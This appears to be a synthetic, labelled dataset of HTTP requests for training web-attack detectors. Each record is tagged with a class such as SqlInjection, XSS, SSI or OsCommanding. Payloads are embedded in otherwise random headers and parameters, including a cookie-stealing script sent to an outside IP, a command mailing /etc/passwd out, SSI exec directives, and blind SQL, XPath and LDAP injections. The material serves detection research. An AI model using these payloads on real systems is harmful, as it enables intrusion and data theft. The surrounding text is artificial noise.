User-Agent: Mozilla/5.0 (Machintosh; U; PPC 8.7; es-i4; rv:8.9.1) Gecko/04172879
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: ssmo
Upgrade: pemoEi/4.0
Warning: 638 www.testaoOo.shtml "I7qnrs9jyxsxit2" 
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

toLfy=e;ysinputn&sosaufrmo=ie&LUPHl6IlR=219&eaEiermrneDonah=efsqs)(  |    (6oA=*)&ahahnlqdsr53oj=o3OyodI8vLzb&hdxh9a6tl2c6vcs=@c7~x+&arbm9pes=841731543&ts=ln5&aranenwctvreie=n$5siqztrapassthru&nrWi6=nEGs&Baccess_logevalqNechoY@Pg=oXdte&ia4msydrhmq4c=httpsa:like

End - Id: 37675
Start - Id: 45034
class: PathTransversal
POST /ns3euwbfoi/9Qelo4qayi.png? HTTP/1.1
Content-Length: 158
Content-Language: M7ieoc,ep,rcksyJ
Content-Encoding: compress
Content-Location: http://ntz7lul.com/o2ptbi/epetvT.bin
Content-MD5: b2R3OEw1YWk4NGNpYW9MSA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Oct 06 03:54:16 UTC
Last-Modified: Wed, 06 Dec 06 05:33:31 GMT
Host: 7.251.112.247:80
Connection: close
Accept: image/*
Accept-Charset: cp-932, x-mac-ce, x-mac-icelandic, windows-1255, windows-1254
Accept-Encoding: *
Accept-Language: sl-7t18oe, e6-p, Q-y;q=0.6, eYhist-nhr;q=0.5
Cache-Control: no-transform
Cookie: jNk4sa3geta8=file:///c:/gHWop/cz/eySdn.xml;Y09g=includeelT
Date: Thu, 30 Mar 06 11:27:27 CET
ETag: ".zcPt1oJM8GXcvho2U"
Expect: 100-continue
If-Modified-Since: Thu, 12 Jun 08 05:53:13 UTC
If-Unmodified-Since: Fri, 21 Jul 06 11:36:39 GMT
If-Match: *
If-None-Match: "fp.-CylQFrI5ng60vA"
If-Range: *
Max-Forwards: 931
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: JnfSo p4thta=hsnlta
Authorization: Digest opaque="csfs"
Referer: /atwd/dUtybs/btoxf.pdf
TE: trailers,trailers,deflate
User-Agent: Mozilla/9.2 (Machintosh; U; PPC 4.7; mh-vt; rv:1.9.6) Gecko/47721011
UA-Color: color16
Via: nEe/4.7 172.125.207.192, HTTP/5.2 www.ens341aO.css, FTP/9.3 www.asoobRnd.png
Upgrade: ado/3.2, itnor/6.3
Warning: 517 www.n1bOS.jpg "aaleosr" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ka26oaothRa=984&toIre=wyeesslgwg7u?&oyoh7ndaaf=6094&io=kmdeu&nmhnl=iethdh&me3rpt=ElSnv idr&5afbo1Uraleltr=uwfveQ4B8&nr8JQorfOReWW=%uxela<)s&Rwuu=12212

End - Id: 45034
Start - Id: 41330
class: SqlInjection
GET /exrZ/cwXM09_1v.hmC0A/priqdhedto/tE/ebwaO5w7beaIhamehien/son/aRmrm3maell/ckRBE7cuY0qxn/2feSebeeevm9eo0jrytt.exe?sLthkltljsrT=2233962&Hdrmzeo=mocha&wQdiclNi=7760932&metl4wwm=raJz&iesolo=6070&xtEoeokttrfE=61743&7nsgvo=9000423508&P@Rsock_streamYspt=265&eiesAi5nH9ezqye=pix%7Eernwpanform&nSaha25eiTt=eg93bbFgq&uwrentn=iai%28spm6swteoE&fc1kaStlz9sS=htst%27r%3D8pqfllLg&bhjhtOlsa=ty HTTP/1.1
Host: www.ssaoq.biz
Connection: keep-alive
Accept: audio/*
Accept-Charset: iso-8859-6, x-mac-arabic, x-mac-turkish;q=0.4, x-mac-hebrew, x-mac-arabic
Accept-Encoding: 
Accept-Language: q-docga, UhroDd-iAk
Cache-Control: max-stale=6274
Client-ip: 88.209.68.71
Cookie: oa=of;ttueCoscrzrtsi='     OR    'tre1scHdser'     =    'rew'+'nrp';Yso187htu2oos=iu3union ao12group by;var=|h;sfi;siavwu8fntef1ba=73;tss=tperl?img6meta5vbgnulli 8
Cookie2: $Version="617"
Date: Tue, 02 Nov 04 08:54:12 UTC
ETag: "Zi84.qAj6QKR7xGxwY"
Expect: cehh3lIo=rotitev
If-Modified-Since: Sat, 22 Jul 06 23:19:54 CET
If-Unmodified-Since: Sun, 25 Oct 09 24:39:00 GMT
If-Match: "D@MG454sDcomnil-RK"
If-None-Match: "NR959dajDPO7t51vkLJ2"
Max-Forwards: 7847
MIME-Version: 8.1
Proxy-Authorization: NTLM aU5ldXV0ZWRhdHNyb2EwZWVFaGFzaXNvaXJoOHpzZWRlZGhZ
Referer: http://www.viaa5aee.com/sait/s3maE/oma3k/lasGeay/n5muA.swf
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 9.4; er-ak; rv:2.7.2) Gecko/87277012
Via: FTP/5.2 59.63.114.81:708, 8.8 www.este2rt.jpeg
Transfer-Encoding: hese
Warning: 632 www.S0ar5.shtml "ryOnts4" "Sun, 23 Aug 09 07:52:11 GMT"
X-Forwarded-For: 138.41.36.100
X-Serial-Number: 758648152454288

null

End - Id: 41330
Start - Id: 48432
class: XPathInjection
GET /FL8@6rUrformM/ceaeehj3a/newhxz/hs/rBYUXsEquQ.js? HTTP/1.0
Host: 224.251.140.174
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-roman;q=0.2, x-mac-arabic;q=0.5, windows-1250;q=0.0, x-mac-greek
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=352
Client-ip: 90.129.25.124
Cookie: IYCdf_oFm0kR=26  or statUy/s/fsa/child::node()[position()=708]   or     45=;wnendgGmTsHe=]%ar;Fbetween7kHcsEposition=8794
Cookie2: $Version="9"
Date: Sat, 27 Nov 04 03:06:53 GMT
ETag: "ci-WNRZI4K6JZheahm"
Expect: eieX3af=czitEnip
From: ttfoqhh@Mtehs.org
If-Modified-Since: Mon, 04 May 09 04:13:33 CET
If-Unmodified-Since: Thu, 12 Feb 04 24:27:03 UTC
If-Match: *
If-None-Match: "VzzfCRZ6@yCnN1jmA6dV"
If-Range: Sat, 03 Apr 04 03:01:38 CET
Max-Forwards: 4
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZGlsaG9IbDI6emhlZXM=
Range: 849-343947,4-,-41
Referer: http://rriec.be/odEi/nleeyy/ccyEnssm.css
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 0.9; ht-cl; rv:4.3.1) Gecko/42559565
UA-CPU: PowerPC
UA-Disp: 711,039,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 784x619
Via: 8.3 250.149.108.118, HTTP/8.3 www.8rctQHjE.png, FTP/7.9 68.74.99.79
Transfer-Encoding: compress
Upgrade: 7eaeH/4.4
Warning: 365 193.128.98.208 "ats1" 
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 72505509586520475134
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48432
Start - Id: 46792
class: XSS
POST /ehEsdntdlOr/tu1tyy0uCSvN/oGdiubQoUQKNW/yu3cHeg/YrsNuxtugadeeuNnz/u-FYqzG8nOJcX6F3P/ft5W1oonQmi5N.gif? HTTP/1.0
Content-Length: 377
Content-Language: evhu,tkt
Content-Encoding: gzip
Content-Location: http://cOoonaa.com/qtomT/icInpRi/0htNaeE.tar.gz
Content-MD5: ajB0eXI0aWNsb29oSW1obQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Dec 06 14:02:49 UTC
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: www.usebio.it
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, identity, compress;q=0.0
Accept-Language: *;q=0.9
Cache-Control: 0i5nn9eo='wtihioG'
Client-ip: 160.46.236.124
Cookie: lywtVen=8
Cookie2: $Version="17"
Date: Mon, 09 May 05 16:51:38 GMT
ETag: W/"w6tFK0pcm3oEf.Rt"
Expect: Ksasyns
From: fnwte@lpuewgs.de
If-Modified-Since: Mon, 22 Nov 04 18:32:15 CET
If-Unmodified-Since: Sun, 07 Mar 10 12:34:52 UTC
If-Match: *
If-None-Match: *
If-Range: "icS7uH.4ofWdvcIWE"
Max-Forwards: 0552
MIME-Version: 5.1
Pragma: rdhe=a
Proxy-Authorization: Basic RDBlQWk6ZWloNg==
Authorization: NTLM ZXRDdWl1YVJvT3czbXU4aGh3czNvY2doc3J6ZGUweW5hanFlZW1xZWMxRQ==
Range: 15-86
Referer: http://i6oeh.biz/epalyouh/tein/8son/02k2/kusg.png
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: nVoiIj http://www.Ativi53.biz
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 8.7 181.103.148.235:78857, doan/7.5 www.iarnr.jpeg, HTTP/9.4 www.hi48t.tiff
Transfer-Encoding: gzip
Upgrade: fbr/7.3
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RsYEaZrli=o5SkwtLLR&ucgycoogR8tm=208607&r_JS@LrBQVKJ=3BF_YRfV&qternhumtR7teo=40484&ddAy.QpsX6P=nJh_wDAyH-&5otIo8hmri=f]e?ncewi(x>)&adcaB3a5=327&3nnjt6tn=<img   src    = "mocha:[window.open('http://117.59.123.36/llmaan.jsp'+document.cookie);]       "  >&baD.4vJl3Fbgsound=519502881&49latsIs=087&p3ens5ilirei=50158709&nrtoeoexea=nEB_

End - Id: 46792
Start - Id: 39354
class: SSI
GET /0b/kahidzbeecrQatsetzlR.php?ort5ettittytdh=r6f1f8%5Cci&ZFKtcFH39=ato7&paeaERshoe4Un=8rsarTw&mCLT%ulogx=ooydpsoRaz&_J7K=tNshLrhtwn%27%7EFah&eiacEfF=%3C%21--%23email+fromhost%3D%22www.fa8tbeyt.com%22+tohost%3D%22mailbox.exas.com%22+message%3D%22sjaeem+Xsd7tp+aloqswa8+t3o%22+fromaddress%3D%22Ipntb.com%22+toaddress%3D%22rorva.etsotr.com%22+subject%3D%22am%22+sender%3D%22dn.com%22+replyto%3D%22c4sTort.com%22+cc%3D%22anE%22+inreplyto%3D%22iyf+1nmi+ctqAei%22+id%3D%222romail%22+--%3E&i1m=r78KwA9&varZeyy8=aeSeucpOjtnsuai&edAoodtj4ituiD=nihx HTTP/1.0
Host: 213.147.72.180:9
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: soyz-t;q=0.9, sa2y-iirr, egaS8ole-h, j8nillej-azlis, toft-iPnih;q=0.0
Cache-Control: min-fresh=1040
Client-ip: 183.110.148.152
Cookie: AneceNt3=boot.ini-y2tE o'O0etelswhere/n;ulaen3cey=8c'sscwgety:liframeAMrdo]T;ThzBtaie=055;p98=dNQB;heowsndjet=g
Cookie2: $Version="50"
Date: Mon, 13 Jul 09 16:07:45 GMT
ETag: W/"@4NOJSZ4ADlYgjcuK"
Expect: 1eaet=xvho;paeeore=ucea
From: ztifisTh@itMb.uk
If-Modified-Since: Mon, 13 Oct 08 21:43:56 CET
If-Unmodified-Since: Mon, 27 Sep 04 10:00:34 CET
If-Match: "0Ms39NikF286_k.GHIWg"
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: *
Max-Forwards: 03
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Basic aWZ0dmU1ODptYW1kZG8zZQ==
Range: 1-35,9436-,-246816
Referer: http://www.tTcsr.st/hsets.dll
TE: trailers
Trailer: Host
User-Agent: sehe5 (r81n-E4r; wQ1J4x; ekKTnoXuww; yANCV8; fca8@CtWD)
UA-CPU: 68000
UA-Disp: 6337,771,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: gfpEe/5.9 www.2pia3ra.jpeg, OoPUYa/3.6 213.183.54.18:8
Transfer-Encoding: teee
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 802337450581
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39354
Start - Id: 43303
class: OsCommanding
GET /rn/6yfgnf4dp1siym/ei2lml@Hp9gHMUr/j7fMQJea.vLvkzzmnQv/sAcqP@Cc@4C/et/vgujrn1It.nsf?p2sx069=725660&etmsgledcer=jg%2Berdivvitkwindow.openaeo&jat41abo=32&storxeiDdirsonr=oops%3B++++cat+++++%2Fetc%2Fpasswd++%7C+++++mail+your%40cut.com&tensn4iaija=%40ThSo%5CYoudivkna&bnrnweReatiD=esystemeinsertosmecho&deqihr9mAea=ed6vai&bdttalneB7=3&rrr1o0ra6mUlp=imunN5&tIlsgmveetn25=gEwooWnw HTTP/1.0
Host: 219.187.239.36
Connection: xnaecwck
Accept: video/*, image/gif;q=0.0
Accept-Charset: macintosh, windows-1252;q=0.1, cp-932, windows-1255
Accept-Encoding: *;q=0.1
Accept-Language: rpasEiv-fyEra;q=0.7, loidhghu-t, S1eoW-iai;q=0.8, egsmA-mmgnitde
Cache-Control: min-fresh=4066
Client-ip: 102.61.9.190
Cookie: fdUei=0Tk0AmFe;.mZASPE5=ld5ztctacbaped
Cookie2: $Version="7"
Date: Tue, 23 Sep 08 21:36:21 UTC
ETag: W/"pGAcH-IoVLLI.qP.7"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Fri, 21 Dec 07 05:06:04 GMT
If-Unmodified-Since: Thu, 18 Feb 10 04:58:46 UTC
If-Match: "bo.nYMc.KHOEAqWVu"
If-None-Match: *
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 7
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic cDlzYVNpc3Q6cEZOZnIx
Authorization: Basic dnVvaXNudTpmcHQ3b2lHaA==
Range: -340027,1338-0
Referer: /geiN/QupgHh.jsp
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: aIiEiBoYDB http://www.ypb8.st
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: 3.4 16.51.69.58, FTP/7.7 www.oeriltx.htm
Transfer-Encoding: deflate
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43303
Start - Id: 39362
class: SSI
GET /p0Lrc18wZIq87PCD/t.@dV/b@o3rhv/aZzT62jTik56NcJB/yY2-Pm_3gYROApWYqC.gif?1frt=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&Tonnatr=9&eR=019 HTTP/1.1
Host: www.poRsor6iel.st:80
Connection: yrtiEoh
Accept: image/*, video/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.6, deflate, gzip;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 105.126.198.220
Cookie: 9nt=oo9eHatyr;ctsEaihlssrs=n lservicese;TdEKEFh.VWH=qlfd9-ae9uc;meeuotbsE2eem=e~sssock_streamer]xoupdateeziadminf;np=99380246;Mpyg=84671480
Cookie2: $Version="92"
Date: Mon, 03 Nov 08 08:18:37 GMT
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Sat, 11 Apr 09 05:19:17 GMT
If-Match: *
If-None-Match: "l5hwTGXkh7vltlvqs"
If-Range: Tue, 05 Feb 08 11:07:56 UTC
Max-Forwards: 0995
MIME-Version: 9.5
Pragma: ht=o
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Digest nonce
Range: 009-9597,-73,-30
Referer: /cnguhh/mnaaats.txt
TE: chunked,deflate,deflate
Trailer: Referer
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 9.6; so-re; rv:8.6.0) Gecko/67625339
UA-CPU: 68000
UA-Disp: 3265,6315,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: 6.7 11.130.17.205:130
Transfer-Encoding: identity
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 385637154
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39362
Start - Id: 39190
class: SSI
PUT /icgoteTessl/eetMu9vbtsareemcdv/ZEAxIFfCKjHe/aaG/lYE04zgEu8ydtwdjXz/connectnTTBzSv/t2MfNF/6sase2ushfYuahtr/satneamjH6q0gmwO.cfm? HTTP/1.0
Content-Length: 127
Content-Language: lnu5UEtt,rPm,jidiO
Content-Encoding: compress
Content-Location: /7Rtil.msf
Content-MD5: U3BldWUzYWQ2aU5Bb2FlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:04:18 GMT
Last-Modified: Sat, 23 Jul 05 03:02:02 GMT
Host: 170.218.32.98
Connection: barvotEs
Accept: image/*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: idUo='oae'
Client-ip: 165.60.213.241
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="5"
Date: Mon, 27 Jul 09 16:37:23 GMT
ETag: W/"4o6Nz.t2GynO1u6u"
Expect: 100-continue
From: nGxh@nraae5E.gov
If-Modified-Since: Fri, 10 Nov 06 24:49:25 CET
If-Unmodified-Since: Sun, 27 Mar 05 14:23:51 GMT
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: *
If-Range: *
Max-Forwards: 9030
MIME-Version: 8.1
Pragma: 1woam=eza
Proxy-Authorization: Digest realm
Authorization: NTLM c2l0aXNhZW1lb21wcndBcGtvaGV0dGhzc2R0TG5lZXlrZUFlZnRodHRmdHdveFQ=
Range: 53710-,-18914,6-
Referer: /teclseoE/iat2hz/Olty2R/r1taegiT/iptD.aspx
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 8.2; gs-Ok; rv:5.3.2) Gecko/67630207
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: FTP/4.0 102.30.170.153:3838, 3.4 www.OQnl.shtml
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 4765226560917916
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lseftt2es=<!--   #exec  cgi="/cgi-bin/script?4ihqa"   -->&Nnvl0pl1= ea p&btd=Nve9'toysfea%positionnso2t

End - Id: 39190
Start - Id: 41227
class: SqlInjection
GET /enofsuninnhm/qigzs/ipse4mFOtSiwZH/swa/9uincludekGchildIbBlink3AiE0/ty.kcYTZuzPc0JdNGtsB/likeTqsamZ/i8laeuniot5vamgE/f6Aids.gif?deeo64Itofmiey=1jT&tuaeilweeb=51&ee4teoTays=022889&ne=dl7tbce+%3Emvar+ce&tin=oer9&tih9hGlh=9820678&bOsrpnxpit=n688h0b2P&8p@ZihtaccesQU=adle%3A&idNN=oeesRnain&wbemuaffN02iam=d6SLKx7eEueTtdC&Rssd=ht4o&ptci6ktpUreNu4=a%5D-iwnher5&hkaaiol6ayrD=3eXqA HTTP/1.1
Host: www.pg9mhonie.uk
Connection: keep-alive
Accept: audio/basic;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.3, gzip;q=0.6
Accept-Language: AND    ascii(lower(substring((SELECT  TOP     1  bbgueo  FROM sysobject   WHERE     xtype   =    'U'),1,1))) >  111
Cache-Control: no-store
Client-ip: 206.238.177.255
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="006"
Date: Thu, 16 Feb 06 07:40:20 GMT
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: 100-continue
From: hsk6aaig@oo1it1ta.gov
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: *
If-None-Match: "Bk_U@UYgE_CTDK.u3S"
If-Range: Tue, 23 Aug 05 17:56:47 UTC
Max-Forwards: 07
Pragma: ocst81en='tbnPE'
Proxy-Authorization: Basic aGEwa2hyNDpvZWN0
Authorization: Digest uri=http://Edae.net/oMir/8Tsossh2/7uoi.cgi
Referer: /lfze8n/shaa.jsp
TE: deflate,deflate;q=0.1
User-Agent: Mozilla/4.0 (Machintosh; U; PPC 4.4; tw-kl; rv:7.3.6) Gecko/20261405
UA-CPU: 68000
UA-Disp: 940,2353,32
UA-Color: color32
UA-Pixels: 5345x867
Via: 3.6 82.99.39.106
Transfer-Encoding: deflate
Upgrade: t4nl/2.0, rRkw/3.5, nqe/4.4
X-Serial-Number: 480673046324930914
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41227
Start - Id: 48635
class: XPathInjection
PUT /eNF/8ncyetoeecmn.msf? HTTP/1.1
Content-Length: 342
Content-Language: tn30tg
Content-Encoding: gzip
Content-Location: /eeeaa/rUfktNi/Tezvoew/njntt.tar
Content-MD5: bXVvZnV0ZnRMcmVwcWhtdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Mar 09 07:58:57 GMT
Last-Modified: Wed, 25 Apr 07 23:27:32 GMT
Host: www.iace.org:80
Connection: hguyon
Accept: */*;q=0.8
Accept-Charset: cp-936;q=0.5
Accept-Encoding: 
Accept-Language: tnEc-h, resns7-ibozhG, dusi5No8-uesqtd
Cache-Control: no-transform
Client-ip: 145.67.254.44
Cookie: Eb0Y=ratDrosi;o5=553;o3ze5eAtHiue=1aamocha7<ea1iej;96XsbwQ=lsiig;tOasn=ht;aThatu=ti
Cookie2: $Version="469"
Date: Thu, 05 Mar 09 16:15:45 UTC
ETag: W/"EZ85ec1UkDY_9WvB"
Expect: nIa1=ttl7lssu;IeiaDaia
From: Ninoyjig@whephoIrat.uk
If-Modified-Since: Mon, 20 Jul 09 16:15:39 UTC
If-Unmodified-Since: Tue, 18 Mar 08 03:55:22 GMT
If-Match: *
If-None-Match: *
If-Range: "h4XmmRn.trMSEAPiI"
Max-Forwards: 4
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="39AABfB2d62AF480C2dD2Fe8b3CE4C25"
Authorization: eyris 6av6=zara
Range: -046912,8351-4,007308-22
Referer: /era1f/h9btu/Eblrh/n9moccB.dll
TE: gzip;q=0.7,trailers,trailers
Trailer: Range
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 0.0; ct-u7; rv:2.6.7) Gecko/37563575
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: HTTP/3.1 66.162.17.172
Transfer-Encoding: gzip
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 498858561497
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

he6m=99&oItan=5ts5passwduapegg-s&zZQ4KunionwyQ5d=tt&rNRtSVn3=32109421&dtbatmn5ohzrtot=oelit9/hyuwtn/tsl/child::node()[    position()=36]    |     Du/i/fo/child::text()[position()=670]     or     'aftaeYa8'= '&5kvBevaly=50&Gh=aivhieioamsoe&5X3F_=utna&gorwI=nE4z&Rai6ySeryS=usiPbltEerUo

End - Id: 48635
Start - Id: 37411
class: LdapInjection
GET /idof/aibi98YeQD-fn/ieeA7nmeuu3e/d2sl1egwgwsew6d/p0Vhm/slsohbyxs9jRplt/uniong9location.aUIVandq%uANd/6ecnneRreorezn/4OFRvd/iAc.-o0/eA@z/hTXa9Ju1oVOE04.gif? HTTP/1.1
Host: www.lioestn4l.org
Connection: oldctecn
Accept: image/gif;q=0.6, text/plain, application/x-tar
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, compress, compress;q=0.2
Accept-Language: hhE-7Psx6st;q=0.0, 5rndraxd-ljriit, afneobe-Nssdiea;q=0.3
Cache-Control: no-transform
Client-ip: 112.62.22.134
Cookie: SesWNaada2bBsqt=) ( |(cn=*o'brien* )(mail   =*o    'brien*    ) 
Cookie2: $Version="7"
Date: Mon, 12 Oct 09 14:57:12 GMT
ETag: W/"fYGy0yiXzgbqmdeFk"
Expect: 100-continue
From: Nhpimenh@ddh2omeHLt.ch
If-Modified-Since: Tue, 10 Apr 07 08:55:03 CET
If-Unmodified-Since: Tue, 19 Oct 04 15:51:03 UTC
If-Match: *
If-None-Match: "qEWy-oZz-gnU0bX-gn"
If-Range: *
Max-Forwards: 9549
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic dXJlZmllOmllTGFlZWlk
Authorization: Digest response="CF3cfec9c4A22FAbEF26d0C34ADe4EFb"
Range: 43109-087928,-7,22480-
Referer: http://www.errxttf.net/yrksne/ii66SoO9/icrtobv/iNsoec.cgi
TE: chunked;q=0.4,deflate;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/1.5 (Machintosh; U; Mac OS X 3.4; ai-rf; rv:8.0.3) Gecko/12983431
UA-Disp: 143,2118,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 005x049
Via: FTP/9.9 82.196.149.117
Transfer-Encoding: compress
Upgrade: uthe/2.9
Warning: 856 www.lyor.js:3401 "doia0real" "Thu, 07 Jan 10 05:39:49 CET"
X-Forwarded-For: 140.196.26.207
X-Serial-Number: 50103674881121
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37411
Start - Id: 47658
class: XSS
GET /tJUbv_g8H8Pp4Q/OrhqettiSd6nfrdeE/44s/smop3ll3qOZl8cc7qB_/1@PTJ/hoqtSgIF4tiv2y/7CS0c_U93o_obDyJa.msf?l2rstree9end=3846&7nsKee=8&dnc@_lVAl=avhzhMYjH&rstdguyiReloe=ySopassthrumae&dSzls82ciqs=uBeietH3oiCar&sMtehc3rse=rumnebhoeA&eytcf6le=aIc&AnnklsSeexXeeni=%3Cdiv+style++++%3D+++%22+++binding%3A++++url%28%5Bhttp%3A%2F%2Fwww.esas.com%2Fscript%2FjzbrTn.pl%5D%29%3B+++++%22%3E&rLaa5se8onbe=moah%3C&Eti=12 HTTP/1.0
Host: www.r9l2em0om.de
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mv-2uan
Cache-Control: min-fresh=57
Client-ip: 56.155.32.167
Cookie: swes=lsu
Cookie2: $Version="35"
Date: Sat, 04 Feb 06 23:49:48 UTC
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Tue, 14 Jul 09 20:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 23
MIME-Version: 7.7
Pragma: edtogof='ettrone'
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: om3tn rEsm=iclaTad
Range: 51-,059585-
Referer: http://www.traird.ch/xpnpeT/Hol9gge.swf
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/1.8 (compatible; MSIE 5.2; Win98; lotF)
UA-CPU: 68000
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7165x674
Via: 4.9 23.1.222.104
Transfer-Encoding: identity
Upgrade: lica5r/6.9
Warning: 452 www.Iau7Ie.jpeg "2HekEIt" "Sat, 30 Apr 05 16:23:39 UTC"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47658
Start - Id: 37797
class: LdapInjection
